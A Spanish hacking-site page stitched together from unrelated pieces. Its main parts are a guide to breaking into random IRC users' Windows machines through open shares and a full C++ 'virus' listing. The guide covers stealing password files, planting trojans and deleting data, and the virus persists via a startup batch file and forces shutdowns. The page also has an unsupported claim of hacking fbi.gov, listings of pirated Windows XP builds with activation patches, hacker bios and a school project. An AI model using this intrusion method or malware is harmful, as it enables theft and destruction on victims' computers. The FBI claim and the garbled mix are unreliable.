TRADUCCION

English cv French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

TUS DATOS

IP

chat de colombihacks

Musica CH

CÓMO ENTRAR EN UNA MÁQUINA WINDOWS CON RECURSOS COMPARTIDOS

CÓMO ENTRAR EN UNA MÁQUINA WINDOWS CON RECURSOS COMPARTIDOS

Este hack no se basa en un fallo del windows ni nada parecido. Algunos usuarios tienes redes de trabajo, se reunen para jugar a quake, cambiar fotos porno... ese tipo de cosas, y comparten recursos y no ponen passwords. Si encontramos a uno de estos individuos... le podemos joder lo que queramos o la mayoría de las veces, sacar passwords y archivos importantes (o juegos o fotos porno o...). En esta mini-guía se explican los pasos a seguir para hackear una máquina con recursos compartidos en windows.

  1. Fijar blanco

Necesitamos una IP, si no tenemos un objetivo pensado (como podría ser: el hijoputa de la clase, el profe de mates, el ordenata del director...) puedes entrar en el irc y buscar gente por ahí. Una buena sugerencia es la de elegir a alguien de un canal en el que te gustaría tener op, alguien que te ha jodido y le quieres quitar el nick si lo ha registrado, o simplemente necesitas a alguien para probar y... lo siento chico, te ha tocado a ti xDDD (y eliges uno cualquiera en el canal o si usas mIRC puedes poner:
Para saber la gente que hay en un canal sin entrar en el:
/names #canal

Para pillar una IP aleatoria del canal en el que estamos:
//dns $nick(#,$rand(1,$nick(#,0)))

Si quieres pillar la IP de un nick que ya sabes pones:
/dns nick (nick es el nick del que quieres averiguar la IP)

Entonces ocurrirá algo como esto en el status:
*** Looking up ctv21225141110.ctv.es

*** Resolved ctv21225141110.ctv.es to 212.25.141.110

Tenemos la IP, que en este caso es 212.25.141.110, podemos pasar al siguiente paso.

  1. Averiguar el nombre de la máquina objetivo

Para poder entrar primero necesitamos saber cuál es el nombre de la máquina, para ello usaremos el programa nbtstat con el parámetro –A, que sirve para pillar la tabla de nombres de la máquina objetivo a partir de la IP. Este comando se usa así: ‘nbtstat –A 123.123.123.123’. Podemos ejecutarlo desde un prompt del DOS, desde Inicio-Ejecutar o desde mIRC con el comando: /run nbtstat –A DirecciónIP
Una sugerencia para mIRC es escribir éstas líneas en los remotes:
On 1:Dns: {

echo $iaddress

clipboard $iaddress

run nbtstat –A $iaddress

}

Y cuando hagas un dns te hará el nbtstat automaticamente.
(se nota que soy scripter)
He ejecutado el nbtstat con fliper (víctima):
nbtstat –A 212.25.141.110

y me ha respondido algo así:
Host not found.

Lo que quiere decir que o no tiene el netbios activo, o no usa windows o no se encuentra nada en esa IP (puede que se haya desconectado, que la hayas escrito mal...), o sea, Paso1 y a buscarse otra víctima.
Repetimos, ya tengo otra víctima y ejecuto el comando ‘nbtstat –A IPdelavíctima’
Esta vez ha contestado algo como:

NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------

SUSO           <00>  UNIQUE      Registered

SUSOHACKER     <00>  GROUP       Registered

SUSO           <03>  UNIQUE      Registered

MAC Address = 44-45-53-54-00-00
Ahora sabemos que el nombre de la máquina es SUSO (primera entrada <00>), que el nombre del grupo es SUSOHACKER.
El nombre de la máquina es el primer UNIQUE de la tabla, y los grupos que hay son reconocidos fácilmente por GROUP.
Pero antes de qué empieces a dar saltos de alegría por haber encontrado un objetivo válido, he de decirte que este no nos vale (que malo soy... xDDDDDD). Para que el objetivo valga (o sea que haya posibilidades de entrar en él) tiene que haber por al menos una entrada <20>, y en este caso no la hay.
Repetimos Paso1, hacemos el ‘nbtstat –A Ipvíctima’ y encontramos un individuo con una entrada <20>:
NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------

SANTI          <00>  UNIQUE      Registered

CORBA          <00>  GROUP       Registered

SANTI          <03>  UNIQUE      Registered

SANTI          <20>  UNIQUE      Registered

CORBA          <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00
Este individuo tiene una entrada <20> y es la que nos vale, tenemos el nombre de su máquina qué es SANTI, recuerda que es el primer UNIQUE. Podemos pasar al Paso3.
El que os haya puesto víctimas que no valían era para que vierais los resultados más cómunes antes de pasar a la acción, y si no te sale a la primera, saldrá a la segunda. También decirte que tienes que tener en la conexión que estés usando en propiedades la casilla de NetBEUI y Conectarse a la red activadas, luego ve al Panel de Control y en Red, comprueba que tienes Compartir impresoras y archivos activados.

  1. Añadiendole a nuestra lista de hosts

Abrimos el archivo C:\WINDOWS\lmhosts (no confundir con lmhosts.sam, que es un ejemplo (sam de sample)) y escribimos (con el bloc de notas, no me seas burro) en la ultima línea (qué puede ser la primera si acabamos de crear el archivo xD, quiero decir que podemos tener varios ordenatas metidos en la lista):
123.123.123.123 NOMBRE
Ésta es una parte de mi lmhosts para que os hagais una idea:
212.25.137.75 LINUX

152.71.32.128 BLEIS239

147.156.122.7 BLANC

194.224.88.221 JOSU

147.83.4.168 ANT

Y lo guardais. Ahora lo más importante, que en todos los textos que había leído sobre ésto antes de conseguir hacerlo no lo nombraban (lo que me hace suponer que se habrían limitado a copiárselo de otro y no lo habían hecho nunca)
Decirle al NetBIOS que actualice la lista, que añada el nuevo host. Esto es así:
‘nbtstat –R’

y responderá:
Successful purge and preload of the NBT Remote Cache Name Table.

Lo ejecutais donde querais. En Inicio, mIRC, DOS...
Añadido a la lista y pasamos al Paso4.

  1. Qué comparte y como entrar

Usamos el comando net view para ver lo que comparte:
‘net view \\ANT
Saldrá algo así:

Recursos compartidos \\ZEUS

Compartido   Tipo         Comentario
---------------------------------------

CDROM        Disco

C                    Disco

PRINTER1   Impresora

El comando ha sido ejecutado con éxito.

También podemos hacer Inicio-Buscar-PC... \\ZEUS
Luego desde DOS podemos hacer DIR \\ZEUS para ver los archivos, o en ejecutar \\ZEUS y se abrirá una ventana con lo que tiene compartido. Ahora le podemos copiar archivos, leer archivos y tal como si estuvieran en nuestro ordenata (irá muuuy lento, no os desespereis).

  1. Estamos dentro, qué hacer?

Archivos para pillar:

  1. System.ini: no es otra cosa sino que el archivo de configuración de Windows. No ocupa demasiado así que es de lo primero que debemos coger. Si lo abrimos con el bloc de notas y vamos a la sección [Password Lists] nos dirá los logins y las listas de  passwords para los usuarios del ordenata. Nos aportará mucha información importante.
  2. *.PWL: son los archivos de PassWord List, arriba se indica como cogerlos nos darán algunos password de los usuarios.
  3. Otros ficheros de passwd: Si vemos algún programa como el cuteFTP podemos cogerle los archivos de passwords que se guardan en el disco duro. Ej: users.dat
  4. Logs: si algún usuario conecta al irc, que si hemos pillado su IP en el IRC será porque conecta, puede que esté guardando logs. Busca logs con el nombre de bots como: NiCK.log, CHaN.log, etc. Si es admin de un canal o está registrado, o queremos pillarle el nick estos son los archivos que nos ayudarán.
  5. Malos usos: También podemos robar fotos porno, leer ficheros confidenciales, pringar mp3... Pero seguro que todo lo anterior tampoco era bueno XDD

Si por suerte tenemos acceso total:
Si por alguna casualidad de la vida tenemos acceso total:

  1. Troyanos: le podemos meter troyanos, simplemente lo subimos y se lo añadimos al autoexec.bat por ejemplo, la próxima vez que reinicié se le instalará. Tiene el inconveniente de que si le queremos meter el NetBUS o el BO o lo que sea no se le instalará en el momento. AH!!!! Ni se os ocurra intentar instalarselo desde vuestro ordenador, a lo mejor os pensais que haciendo 2click en el icono se le instalará, y lo que estarás haciendo es traerlo a vuestro ordenador y ejecutandolos en el vuestro.
  2. Viruses: como antes los troyanos le puedes meter cualquier virus que se te ocurra, también puedes reemplazarle algún fichero que vaya a usar por el virus para joder más, como renombrarlo a command.com. Si entiendes un poquito más le puedes coger algún programa y en ensamblador meterle algunas instrucciones más. O con el resource workshop cambiarle el icono, las propiedades del fichero... y hacerle creer que se trata de otro programa! XD
  3. Todos contra la pornografía infantil: si te encuentras con un directorio lleno de fotos chungas desas, puedes bajartelas (si eres un pederasta, pedófilo, infanticida...) o puedes borrarlas todas...
  4. Ser cabrón: borra todo lo que se te ocurra o te de tiempo, modifica los programas con un HexEditor y con cortar un cachito ya quedará inservible el fichero. Este uso es un pelín... cracker-lamer y siempre que hagas cosas de estas procura no dejarte nada dentro.
  5. Firmar: si no has hecho nada malo puedes dejarle un txt en el escritorio con tu nick, fecha, hora y si eres bueno y honrado “hasta” puedes decirle que ponga passwords o no comparta nada.
  6. Deja volar la imaginación: todo tipo de programas y acciones dependiendo de cuál sea tu objetivo.

Esto se ha acabado y creo que con eso estarás entretenido unas horitas... A ver si os animais y escribís sobre cosas que sepais que siempre le será útil a alguien por muy malo que seas. Podeis encontrarme por el irc-hispano con el nick de DarkAngel en los canales #100scripts y #hack, pero mejor me pones en la notify porque es muy probable que esté por ahí trapichando.

by Black-Hack ©2012

Dejar sin internet a una [victima]

HACKERS Y CRACKERS

Una vez bien planteados los conceptos de cracker y hacker podemos establecer unas cuantas diferencias entre éstos individuos.
Por lo general, el término “hacker” suele utilizarse de manera errónea en la informática, a un hacker suelen asociarlo con las personas que realizan actos ilícitos por medio de las computadoras (phishing, virus, defaces, etc.), esta es una idea completamente errónea pues se podría decir que los hackers son los buenos (los que programan el software que utilizamos) y los crackers lo malos (aquellos que se encargan de vulnerar los sistemas que crean los hackers).
hackers1

HACKERS FAMOSOS 
Grace Hooper
La graduada en matemáticas y física en el Vassar College Grace Hooper se asimiló en la Marina de Guerra de los Estados Unidos, llegando a ascender al grado de Almirante. 

Grace Hooper, en forma infatigable se dedicó a investigar acuciosamente las posibilidades de programación en las computadoras, de la Primera y Segunda Generación. Sus compañeros de trabajo comentaban que ella trabajaba como un "hacker". 
Durante la segunda guerra mundial, trabajando en su computadora Mark I la almirante Hooper se dedicaba a sus investigaciones y experimentos, incluso fuera de su horario de trabajo o hasta en días festivos.

Grace Hooper creó el lenguaje Flowmatic, con el cual desarrolló muchas aplicaciones y en 1951 produjo el primer compilador, denominado A-0 (Math Matic). En 1960 presentó su primera versión del lenguaje COBOL (Common Business-Oriented Language). 
Paradójicamente, recibió entre muchos reconocimientos y condecoraciones, el título de Hombre del Año en Ciencias de la Computación, otorgado por la Data Processing Managment Association. También fué la primera mujer nombrada miembro distinguido de British Computer Society y hasta el día de hoy es la primera y única mujer con el grado de Almirante de la Marina de Guerra de su pais. Grace Hooper falleció en 1992.
La almirante Grace Hooper recibió el apelativo de"The amazing Grace" ( la asombrosa Grace) y es considerada la primera hacker de la era de la computación
.
Kevin Mitnick
Como hacker, su carrera comenzó a los 16 años cuando, obsesionado por las redes de ordenadores, rompió la seguridad del sistema administrativo de su colegio. Para Kevin,el quehacer diario en sus últimos diez años fue el explorar y "explotar"computadoras ajenas y sistemas telefónicos.
¿Suprofesión? "hacker", y sin duda muy bueno. Según el Departamento de Justicia de los Estados Unidos, este "terrorista electrónico", conocido como "el Cóndor", fue capaz de crear números telefónicos imposibles de facturar, de apropiarse de 20.000 números de tarjetas de crédito de habitantes de California y de burlarse del FBI por más de dos años con sólo un teléfono celular apañado y un ordenador portátil. Un tipo fino.

Mitnick ya fue arrestado en 1988 por invadir el sistema de Digital Equipment. Fue declarado culpable de un cargo de fraude en ordenadores, y de uno por posesión ilegal de códigos de acceso de larga distancia. Adicionalmente a la sentencia, el fiscal obtuvo una orden de la corte que prohibía a Mitnick el uso del teléfono en prisión alegando que el prisionero podría obtener acceso a ordenadores a través de cualquier tel%eacute;fono. A petición de Mitnick, el juez le autorizó a llamar únicamente a su abogado, a su esposa, a su madre y a su abuela, y sólo bajo la supervisión de un oficial de la prisión.

Después de varios intentos infructuosos, buscando perlas de telefonía, se encontró con la computadora de Tsutomu Shimomura, a la cual accedió en la Navidad de 1994. Shimomura es un físico, programador y experto en sistemas de seguridad del San Diego Supercomputer Center, y también muy buen hacker, aunque forma parte de los llamados "chicos buenos" y ejerce de consultor de seguridad informática. Y, tal como se cuenta en Takedown, al "malo" le llegó su hora; tras una ardua persecución, le pillaron. Aquí está la impresionante acusación federal a Mitnick. 
Vladimir Levin

Un graduado en matemáticas de la Universidad Tecnológica de San Petesburgo, Rusia, fu&racute; acusado de ser la mente maestra de una serie de fraudes tecnológicos que le permitieron a él y la banda que conformaba, substraer más de 10 millones de dólares, de cuentas corporativas del Citibank.

En 1995 fué arrestado por la Interpol, en el aeropuerto de Heathrow, Inglaterra, y luego extraditado a los Estados Unidos.

Las investigaciones establecieron que desde su computadora instalada en la empresa AO Saturn, de San Petesburgo, donde trabajaba, Levin irrumpió en las cuentas del Citibank de New York y transfirió los fondos a cuentas aperturadas en Finlandia, Israel y en el Bank of America de San Francisco, Estados Unidos.

A pesar de que la banda substrajo más de 10 millones de dólares al Citibank, Levin fué sentenciado a 3 años de prisión y a pagar la suma de US $ 240,015 a favor del Citibank, ya que las compañias de seguros habían cubierto los montos de las corporaciones agraviadas. 
Ian Murphy

Conocido entre sus amistades como "Capitán Zap", fue el primer cracker en caer tras las rejas. Murphy ingresó de manera ilegal en los computadores de AT&T en 1981 y cambió la configuración de los relojes internos encargados de medir los tiempos y tarifas a cobrar. Así, hubo miles de personas que se sorprendieron al recibir la cuenta y comprobar que tenían grandes descuentos por llamadas realizadas en horario nocturno cuando en realidad lo habían hecho en pleno día.

Caso contrario con respecto a los que llamaban a media noche con el pretexto de ahorrar, porque recibieron abultadas e inexplicables facturas.

Murphy, ahora gerente general de IAM/Secure Data Systems, fue la inspiración para la película "Sneakers". 
Robert Tappan Morris

El 2 de noviembre de 1988 Robert Tappan Morris conocido como el gusano Morris diseñó un gusano que fue capaz de botar 1/10 de la Internet de entonces (lo que significa que inhabilitó cerca de 6 mil computadores).

El sujeto cometió el error de hablar en los chat sobre su creación meses antes de llevar a cabo el plan. De esta manera, no fue muy complicado para la policía dar con su paradero.

Robert Morris fue el primer individuo en ser procesado bajo el Acta de Fraude y Abuso Computacional de EE.UU., pero sólo se vio obligado a realizar servicios comunitarios y a pagar la fianza, todo bajo el pretexto de que el virus de su creación no había destruido los archivos de las m´quinas afectadas.

Sin embargo, el costo de erradicar el gusano de los computadores infectados fue de US $ 15 millones.

El "Gusano Morris" fue determinante a la hora de fundar el "Equipo Anticiberterrorista CERT" (Computer Emergency Response Team), que se encargaría de lidiar con futuros problemas de similares características. 
Los escuadrones Mod Y Lod

En 1993, los Maestros de Decepción (Masters of Deception) fueron los primeros crackers en ser capturados gracias a la intervención de líneas telefónicas.

Tipos de gran fama por tener numerosas formas de evitar el pago de llamadas telefónicas de larga distancia, los MOD además podían escuchar conversaciones privadas e incluso crear enormes líneas multiconferencias que compartían con sus amigos.

Junto con pasarlo bien a través del teléfono, hackearon muchas bases de datos, incluyendo la de la National Security Agency, AT&T y la del Bank of America. También pudieron acceder a los registros de la Credit Record Repoting Agency y de esta manera "ojear" los registros de los ricos y famosos.

Como si fuera poco, los MOD tienen m´s credenciales que mostrar. Famosas fueron las guerras contra la Legion de Doom (LOD), otro grupo de crackers que tenía la reputación de ser la guarida de los elementos de elite de este mundo subterráneo.

El nacimiento de los MOD se remonta a un tiempo de intensas disputas internas entre los miembros de LOD. Uno de sus líderes, el hacker Phiber Optik, dejó dicha comunidad y formó MOD. Desde ese momento se sucedieron una serie de batallas por obtener el título de "Cracker King", hasta que la mayoría de los integrantes de ambos bandos fueron capturados en 1993.

Son muchos los testimonios que aseguran que ningún miembro de MOD habría sido castigado si no hubiesen participado en los constantes enfrentamientos contra la LOD. 
Chen Ing-Hua

Conocido en el mundo como el creador del virus Chernobyl o CIH, estejoven taiwanés de 25 años dijo a las autoridades de su país que difundió el programa informático el 26 de abril de 1999 para que coincidiera con el decimotercer aniversario del desastre nuclear ocurrido en la antigua URSS.

Licenciado en ingeniería informática, Chen Ing-Hua aseguró que usó las iniciales de su nombre (CIH) para denominar técnicamente al virus, mientras estudiaba en la Universidad de Tantung, en Taipei.

"Diseñé el virus porque estaba enojado y porque todos los programas antivirus existentes en Internet son ineficaces", dijo en su momento Chen Ing-Hua a las agencias internacionales de noticias. También precisó que no pensó que su creación pudiera causar tanto daño.

Por este hecho, la universidad lo denunció en el mes de mayo de 1999 ante las autoridades estatales de Taipei, tras paralizar centenares de miles de ordenadores en el sudeste asiático. El virus causó importantes daños en Corea del Sur, aunque el impacto fue mucho menor en Europa y prácticamente nulo en los Estados Unidos. 
David Smith

Nacido en Aberdeen (New Jersey), David L. Smith de 31 años de edad, fue acusado de crear el virus Melissa que se propagó rápidamente en centenares de millones de ordenadores de todo el mundo. Apareció por primera vez ante las cámaras de televisión y los fotógrafos de las agencias de noticias, cuando salió de la Corte Superior del condado de Monmouth, tras enterarse de los cargos de que era inculpado: interrupción de las comunicaciones públicas, conspiración para cometer el delito y robo de servicios de ordenadores en tercer grado.

De prosperar las denuncias que enfrenta, Smith podría pasar por lo menos 40 años en prisión y sería obligado a pagar una multa de más de 400.000 millones de dólares. Este programador informático admitió ante el alto tribunal de justicia de haber accedido de forma ilegal a América Online con el propósito de enviar el virus a través de Internet. 
Onel e Irene De Guzmán

Esta pareja de hermanos filipinos reconoció durante una rueda de prensa realizada en su país que habían difundido el virus I Love You de manera accidental. En el caso de Onel De Guzmán, de 22 años, ex-alumno de la Universidad de Informática AMA y principal sospechoso de haber creado este programa, adujo que su actuación fue una señal de censura por que el servicio de Internet en su país es costoso para los jóvenes, en lugar de ser gratuito.

Pese a las acusaciones de las que han sido objeto los hermanos De Guzmán, las autoridades de filipinas se encuentran en un serio dilema, en virtud a que legislación no tipifica como delito la piratería informática. Por esta situación, no pueden ser calificados de sospechosos y, por lo tanto, no se les puede citar a declarar de forma legal, indicó su abogado personal.

IMPORTANTE
Muchos Hackers "malignos" utilizan las debilidades de Windows para ingresar a una PC remotamente mediante el uso de programas hack, backdoor, troyanos, etc. Por ejemplo Internet Explorer se podría decir que es uno de los navegados mas débiles que hay, ya que desde hace años se le han detectado graves fallas de seguridad (paradójicamente es el mas popular).

pasos para hacer un virus c++

Pasos para hacer un virus en C++
// The Matrix Virus
// Created by W3irdo
// Hazuras.com

El virus matrix, es un virus que se programa en C++, y que es potencialmente dañino para un computador con el sistema operativo windows – aunque desconozco que puede pasar en un Mac – …Aunque no le encuentro utilidad alguno -quizás para como una venganza – , lo encuentro tan curioso que no pocas veces he pensado en ejecutarlo.

Este programa al ser ejecutado dañara irreversiblemente el computador – eso me han dicho, yo todavía no lo ejecuto- , y es tan fácil de hacer como copiar el siguiente código en el programa de C++


#include <iostream>
#include <stdlib.h>
#include <windows.h>
#include <iomanip>
#include <stdio.h>
#include <conio.h>
#include <fstream>
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << “@ECHO OFF \n”;
fp << “START C:\\rawr.exe \n”;
fp << “EXIT”;
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]=”C:\\rawr.exe”;
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp(“CLICK.bat”, ios::app);
fp << “@ECHO OFF \n”;
fp << “COPY matrix.exe C:\\rawr.exe \n”;
fp << “START C:\\rawr.exe \n”;
fp << “EXIT”;
}
system(“START CLICK.bat”);
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system(“call shutdown.exe -S”);
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << “0%”;
cout << setw(4) << “P”;
cout << setw(4) << ” “;
cout << setw(4) << “)”;
cout << setw(4) << “#”;
cout << setw(4) << “X”;
cout << setw(4) << “@”;
cout << setw(4) << “1&”;
cout << setw(4) << “*”;
cout << setw(4) << “||”;
cout << setw(4) << ” \a”;
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
Tan facil como copiar, pegar y ejecutar…
Para quienes quieran verlo funcionar, he aqui pequeño un video:


el mejor hackeo de JDI

hacked by. COLOMBIAHACKS-OP LATIN


http://pastebin.com/kQqmyGFB

MALA SEGURIDAD DEL FBI (MEJORAR SEGURIDAD ) ERROR LINEA 2890 PUERTA DE
ENLACE ABIERTA VULNERABLE A LOIC  EN ESE MOEMNTO PARA NUESTRA SUERTE
NO ESTA ATIVADO EL APACHE


  1.                              *************************
  2.                                  COLOMBIAHACKS-LATIN
  3.                              ************************
  4. HACKED BY: F3NIX_H4CK3R Y JDI DE COLOMBIAHACKS
  5. Target: http://www.fbi.gov/

    NUESTRO MEJOR HACKEO 2011 17 DC

    NOTA TANTO FENIX COMO YO JDI ADMIN DE COLOMBIAHACKS NO MODIFICAMOS NADA EN LA BASE DE DATOS DE ESTA PAGINA SOLO DIMOS NOTIFICACION DEL ERROR NO SOMOS HACKERS NO SOMOS CRACKERS SOMOS COLOMBIAHACKS 

    1. [+]State_Totals: HACKED
    2.  PARTE DE DESENCRIPTADORES COLABORANDO CON EL ATAQUE
    3. Alabama 6,575 1,051,338 1,529,702 2,316 49,875 21 3,425 5,235 1 144,414 193,351 30 0 0 0 0 0 2,986,283
    4. Alaska 37 194,579 311,040 1,118 13,736 3 560 883 1 15,119 21,756 2 0 0 0 0 0 558,834
    5. Arizona 286,556 828,342 804,468 2,592 39,811 6,643 885 599 0 69,091 53,078 10 0 0 0 0 0 2,092,075
    6. Arkansas 181,369 487,630 1,079,343 741 33,050 187 1,041 2,836 2 67,202 203,124 12 0 0 0 0 0 2,056,537
    7. California 2,468,442 2,867,388 3,121,380 0 207,864 16,483 0 0 0 0 0 0 0 0 0 0 0 8,681,557
    8. Colorado 54,507 1,153,426 1,579,971 0 186,149 2,891 0 0 0 0 0 0 0 0 0 0 0 2,976,944

putty redes

PuTTY 
“Conecta rápidamente a Telnet, SSH y otros protocolos”

programador Fabrizio Ferri-Benedetti sobre PuTTY
PuTTY es un emulador de terminal, un programa que permite conectar con máquinas remotas y ejecutar programas a distancia. PuTTY se conecta como cliente a múltiples protocolos, como SSH, Telnet o Rlogin.
La ventana principal de PuTTY es la de configuración, que contiene un completo árbol de opciones. Las básicas están en el primer apartado, Session: introduce allí la dirección del servidor, el puerto y el tipo de conexión. Luego, haz clic en Open para establecer la conexión.
Al cabo de unos segundos, PuTTY muestra una línea de comandos, precedida por un cuadro de diálogo en caso de que no hayas aceptado todavía el certificado pertinente. Un clic en el icono de la ventana da acceso a un menú con funciones para controlar la sesión o copiar datos al portapapeles.
Pros
  • Conexiones SSH, Telnet, SFTP, Rlogin y Raw
  • Numerosas opciones de configuración
  • Ayuda muy completa
Contras
  • Para SFTP hay que usar otro ejecutable

proyecto mundotron

FUNCIONAMIENTO

  1. L a fuente de poder es la encargada de proveer energía tanto a la tarjeta madre como a los 2 motores eléctricos además refrigerar todo el prototipo.
  2. La mother board en si es el alma del computador ya que en esta van ir conectados 2 conectores paralelos los cuales brindaran el soporte de a los 2 motores  además en ella están alojados los diferentes elementos que necesita la máquina para poder funcionar como procesador memoria RAM periféricos de entrada y de salida disco duro y unidad de Cd entre otros.
  3. Este sensor será el encargado de mantener en un clima ambiente a la parte de suelo y aire para que puedan sobrevivir los animales que en ella vivirán
  4. Este sensor se encargara de mantener  la temperatura del agua en nivel medio ya que en un ambiente real el agua tiende a cambiar radicalmente
  5. El bonsay de árbol de limón brindara un ambiente agradable y natural a mundotron además purificara el aire  en el sitio donde se lo instale
  6. El agua es la encargada de brindar vida al los peces que vivan hay y estos darán un enfoque agradable de la vida marina
  7. La tierra es lugar donde vivirán los diferentes insectos y estos darán un enfoque de la vida terrestre
  8. Este  motor será el encargado de mover  el agua y así tenga la apariencia de un ambiente real
  9. Este motor se encargar de oxigenar el agua y controlar la burbujas que salgan de el
  10. Los insectos brindaran un enfoque más de la vida natural en un ambiente artificial
  11. El monitor en le se supervisara y monitoreara todas las actividades que en la maquina se realicen como temperatura de agua y tierra temperatura de la placa madre y el desarrollo de los diferentes animales y plantas que en mundotron vivan
  12. ANEXOS DE FUNCIONAMIENTO los 2 sensores tanto de calor como de frio serán controlados y adaptados mediante un cable paralelo y un conector de impresora paralelo del mismo modo el motor de oxigenación  además para ver en modo digital se implementar un software diseñado especialmente para esta tarea lenguaje visual.






PROTOTIPO







CLASES DE WINDOWS XP

Siendo sinceros, creo que Microsoft ha llegado a ser lo que es en gran parte gracias a la piratería. Ya que por un lado a permitido crear una sensación de dependencia al usuario, ya que estos únicamente han conocido en su vida este sistema operativo.
Por otro lado esta dependencia arrastra a las empresas a tener que comprar dicho sistema operativo, ya que todos sus usuarios no conocen ninguna otra alternativa, son las empresas las que se ven obligadas a pagar los precios por las licencias de este SO a riesgo de recibir grandes multas.
Por lo general cuando nos hacemos con una copia pirateada de Windows, desconocemos lo que esta nos ofrecerá. Hoy te propongo que descubramos entre todos las mejores versiones piratas de Windows XP.
Windows XP Fenix Team
La versión de Windows XP desarrollada por Fenix Team cuenta con dos versiones de Windows XP Profesional con SP2.
Uno es el ya conocido Windows Sin XP (Windows XP Fenix Team), y un nuevo proyecto llamadoWindows XP Cynet, que al igual que el WSXP es ligero y optimizado en redes / Cybers
Datos generales para ambas versiones:
- Es una ISO de 509 MB lista para ser grabada generandote un CD completamente booteable.
- Incluye el parche WGA (Sistema Legitimo)
- Completamente desatendida, no requiere tu intervencion asi como clave o activacion.? :51500000:
- Actualizaciones de Post SP2 al 20 de Mayo 2006
- Parche UXTheme.dll
- Frecuencia de respuesta de puerto USB: 250
- Maximas conexiones simultaneas: 100000.
- Incluye un menu de autoejecutable en el cual podrás encontrar el documento que detalla cada sistema ademas que tiene como extra generadores de diskettes de arranque especiales para estas versiones.
Ademas de instalar automaticamente software básico y funcional para cualquier PC.
- Acrobat Reader 7 ESP
- Codecs Audiovisuales (Incluye Media Player Classic)
- Mozilla Firefox 1.5.0.3 ESP (Incluye extensiones y plugins)
- Net Frameworks 1.1 ESP
- WinRAR 3.51 Corp. ESP
- NOD 32 ESP (Podrás encontrar su instalador en el escritorio, si no lo deseas simplemente borra el instalador)
BioWindowsmax / BioVista Max
Mezcla los dos sistemas: Windows XP y Windows Vista. En este Windows todas las pantallas de instalación están en español aunque el lenguaje nativo interno es ingles del reino Unido.
BioWindowsmax es una mezcla de las mejores características de Windows XP y de Windows Vista (si ya sé que muchos opinarán que Windows Vista no tiene nada bueno…).
Está Version de Windows XP SP2 no lleva SP3, es un Windows XP SP2 Original con algunos extras, que consigue un mejor rendimiento. Cuenta con mejoras de la interfaz al integrar Windows Blinds.
Esta versión es una de las mas pesadas ya que junto con el sistema se incluyen abundantes actualizaciones críticas de seguridad y actualizaciones de XP
Windows XP Colossus Edition
Esta versión de Windows XP es una versión modificada del Windows original la cual incluye elService Pack 2 (SP2), las actualizaciones críticas hasta el día de la fecha, controladores SATA, controladores de dispositivos de red, una instalación en forma desatendida (sin intervención del usuario), optimización en la carga y además de un menú para instalar aplicaciones de terceros una vez que finaliza la instalación del SO, entre otras muchas cosas más.
Windows Ultimate Edition
Esta versión pirata de Windows es de las que posee instalación desatendida (el usuario no intervine durante la instalación del SO), muy útil para administradores, técnicos…
Contiene.
    · WGA 1.5 – Parche para Windows Geniune Advantage 1.5 · WU6 – Windows Update 6 · UXTheme – UXTheme.dll modificado para soportar temas no firmadas · 80.000 conexiones simultaneas sin terminar (antes 10) · SFC Deshabilitado – protección de archivos de sistemas deshabilitada · Sin requerimientos mí­nimos (RAM & HDD) para la instalación · Prefetch Cache – arranque · Soporta dominios y esta optimizado (incluye servicio horario de Windows) · Winamp sin WMP – Windows Media Player ya no es necesario para otros reproductores · IIS – Internet Information Server disponible · 95% instalable en cualquier partición – ahora ya casi no es necesario que sea C: · No incluye controladores SATA / RAID / IDE – no mas problemas con pantallazos azules (BSOD) · DirectX Diciembre – Ultima versión de DirectX · OEM desactivado – podrás cargar los controladores SATA desde el disquete como con cualquier Windows XP · Soporte para Logitech WingMan y Microsoft Side Winder · Restaurar Sistema disponible – desde WPI · Windows Firewall – desactivado · QoS – Ya no se reserva ancho de banda el servicio Quality of Service · WPI ahora con barra de progreso – podrá ver lo que falta para terminar la instalación · WPI ahora funciona en resolución 800×600 · Se limpian algunos registros después de la instalación · Limpieza automáticamente después de la instalación (temporarios) · Teclado latinoamericano soportado · Ya no tiene contraseña
Lista aplicaciones que se incluyen junto a WPI:
